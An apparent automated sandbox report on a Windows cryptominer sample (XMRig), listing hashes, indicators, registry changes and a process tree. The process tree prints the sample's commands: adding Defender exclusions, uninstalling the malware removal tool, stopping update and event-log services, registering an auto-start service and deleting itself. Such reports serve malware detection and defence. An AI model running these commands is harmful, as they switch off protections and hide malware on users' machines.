Analysis
-
max time kernel
303s -
max time network
289s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
21-04-2024 08:13
Static task
static1
Behavioral task
behavioral1
Sample
yofgvjmxzlhk/qrehadfoimfm.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
yofgvjmxzlhk/qrehadfoimfm.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral3
Sample
yofgvjmxzlhk/qrehadfoimfm.exe
Resource
win11-20240412-en
General
-
Target
yofgvjmxzlhk/qrehadfoimfm.exe
-
Size
798.9MB
-
MD5
b83bcfb29a3afb45d53982e18527e251
-
SHA1
93e5f9eb9cad46182b3b0201ecf3fbe7b02af0b0
-
SHA256
f0eedc95c8eeefa8d05ae3bf0fd002ac1a1e1f2a4e6c93e5f0638f9a6f8226bd
-
SHA512
7fb30cbd086bb196b4f200d6fedfd440d358e6f2bce5c0c37a82a2a04790ecd892e74ded78dc0c6cd861e51ff9e472f2c2780bb63c74579b2afb980cf56b2722
-
SSDEEP
196608:JS2bBkpkL2bw+tEBVMDLAFCChInihn+skk6fw:02kkL2s+GBGgJInen+skLI
Malware Config
Signatures
-
XMRig Miner payload 15 IoCs
resource yara_rule behavioral2/memory/4388-98-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-99-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-100-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-101-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-102-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-103-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-104-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-105-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-107-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-113-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-115-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-116-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-117-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-118-0x0000000140000000-0x0000000140840000-memory.dmp xmrig behavioral2/memory/4388-119-0x0000000140000000-0x0000000140840000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 2 IoCs
pid Process 3216 qrehadfoimfm.exe 1820 qrehadfoimfm.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe qrehadfoimfm.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439} qrehadfoimfm.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}\3216.obs qrehadfoimfm.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe qrehadfoimfm.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439} qrehadfoimfm.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}\1820.obs qrehadfoimfm.exe File opened for modification C:\Windows\system32\MRT.exe qrehadfoimfm.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1344 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 1820 qrehadfoimfm.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3216 set thread context of 2700 3216 qrehadfoimfm.exe 142 PID 3216 set thread context of 4388 3216 qrehadfoimfm.exe 143 PID 1820 set thread context of 3652 1820 qrehadfoimfm.exe 164 -
Launches sc.exe 19 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2144 sc.exe 3640 sc.exe 3096 sc.exe 3328 sc.exe 2180 sc.exe 1664 sc.exe 448 sc.exe 832 sc.exe 3384 sc.exe 3864 sc.exe 3016 sc.exe 2636 sc.exe 3984 sc.exe 4036 sc.exe 1804 sc.exe 2676 sc.exe 1856 sc.exe 3996 sc.exe 3948 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 1344 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 3216 qrehadfoimfm.exe 2700 conhost.exe 3332 powershell.exe 3332 powershell.exe 2700 conhost.exe 1820 qrehadfoimfm.exe 1820 qrehadfoimfm.exe 1820 qrehadfoimfm.exe 4472 powershell.exe 4472 powershell.exe 1820 qrehadfoimfm.exe 1820 qrehadfoimfm.exe 1820 qrehadfoimfm.exe 1820 qrehadfoimfm.exe 1820 qrehadfoimfm.exe 1820 qrehadfoimfm.exe 1820 qrehadfoimfm.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe 3652 explorer.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeLockMemoryPrivilege 4388 explorer.exe Token: SeDebugPrivilege 3332 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeLockMemoryPrivilege 3652 explorer.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 4928 wrote to memory of 1148 4928 cmd.exe 103 PID 4928 wrote to memory of 1148 4928 cmd.exe 103 PID 4988 wrote to memory of 1816 4988 cmd.exe 124 PID 4988 wrote to memory of 1816 4988 cmd.exe 124 PID 4488 wrote to memory of 2844 4488 cmd.exe 133 PID 4488 wrote to memory of 2844 4488 cmd.exe 133 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 2700 3216 qrehadfoimfm.exe 142 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 3216 wrote to memory of 4388 3216 qrehadfoimfm.exe 143 PID 2384 wrote to memory of 4284 2384 cmd.exe 155 PID 2384 wrote to memory of 4284 2384 cmd.exe 155 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164 PID 1820 wrote to memory of 3652 1820 qrehadfoimfm.exe 164
Processes
-
C:\Users\Admin\AppData\Local\Temp\yofgvjmxzlhk\qrehadfoimfm.exe"C:\Users\Admin\AppData\Local\Temp\yofgvjmxzlhk\qrehadfoimfm.exe"1⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1344 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1148
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3016
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3948
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4036
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1804
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "PDWIFJZS"2⤵
- Launches sc.exe
PID:2144
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "PDWIFJZS" binpath= "C:\ProgramData\yofgvjmxzlhk\qrehadfoimfm.exe" start= "auto"2⤵
- Launches sc.exe
PID:3640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:2676
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "PDWIFJZS"2⤵
- Launches sc.exe
PID:2180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\yofgvjmxzlhk\qrehadfoimfm.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1816
-
-
-
C:\ProgramData\yofgvjmxzlhk\qrehadfoimfm.exeC:\ProgramData\yofgvjmxzlhk\qrehadfoimfm.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2844
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:448
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1664
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2636
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1856
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3096
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3332
-
-
C:\ProgramData\yofgvjmxzlhk\qrehadfoimfm.exe"C:\ProgramData\yofgvjmxzlhk\qrehadfoimfm.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4284
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:832
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3984
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:3996
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3384
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3864
-
-
C:\Windows\explorer.exeexplorer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
798.9MB
MD5b83bcfb29a3afb45d53982e18527e251
SHA193e5f9eb9cad46182b3b0201ecf3fbe7b02af0b0
SHA256f0eedc95c8eeefa8d05ae3bf0fd002ac1a1e1f2a4e6c93e5f0638f9a6f8226bd
SHA5127fb30cbd086bb196b4f200d6fedfd440d358e6f2bce5c0c37a82a2a04790ecd892e74ded78dc0c6cd861e51ff9e472f2c2780bb63c74579b2afb980cf56b2722
-
Filesize
19.3MB
MD5909abb32f72e78b4c521321bb5fe78de
SHA17651556f67864b62c7979f7d72c47b4940592d10
SHA2569238b3f3146c37cd62e748eb1e15c7e816b123877e921f9bf9566c803eb75813
SHA512d2d5983ebb524b7e55e941dc43a14770b88ed5e5cc52aec232f866e8d4175a804ed04ef55fd587a8845b39249f66684beace62a333f551c69b2780f16b90a5e5
-
Filesize
20.1MB
MD5bf005893b501098ddf1417e8fc885be8
SHA1016f8cde104583b09c279841f66d79ad01966d98
SHA2563102b5a45c265651bdbcf60f2d46103b641ee3c90fde9f5696be8d2a81ac2baf
SHA5121806250e2500a8db0cd9acf91b95b7c9c7142a8e816c8b741416d053d89e240b5722d7bd52383cc3c2d2b840a5553d16323d899e61af2ce3b08de36afa0b674c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5c760880d6bc08cda4e37517b962c15c8
SHA1f5ffa613e2160452ec84b89fe7a1d2fb5a1c1c12
SHA25619a17a4c2670d8b8d6b08f4f8e07f3cc87c0c42634f0dbccc26f035185b56396
SHA5124f7a4fa10f47a7bf3a7159e54e3c3dc89d0e950e8ef58cf34dda0f960916a4a5aee6adf3ba342326a591e34f7cbb03404700bb3578edb1fee3be1f439ae76ea0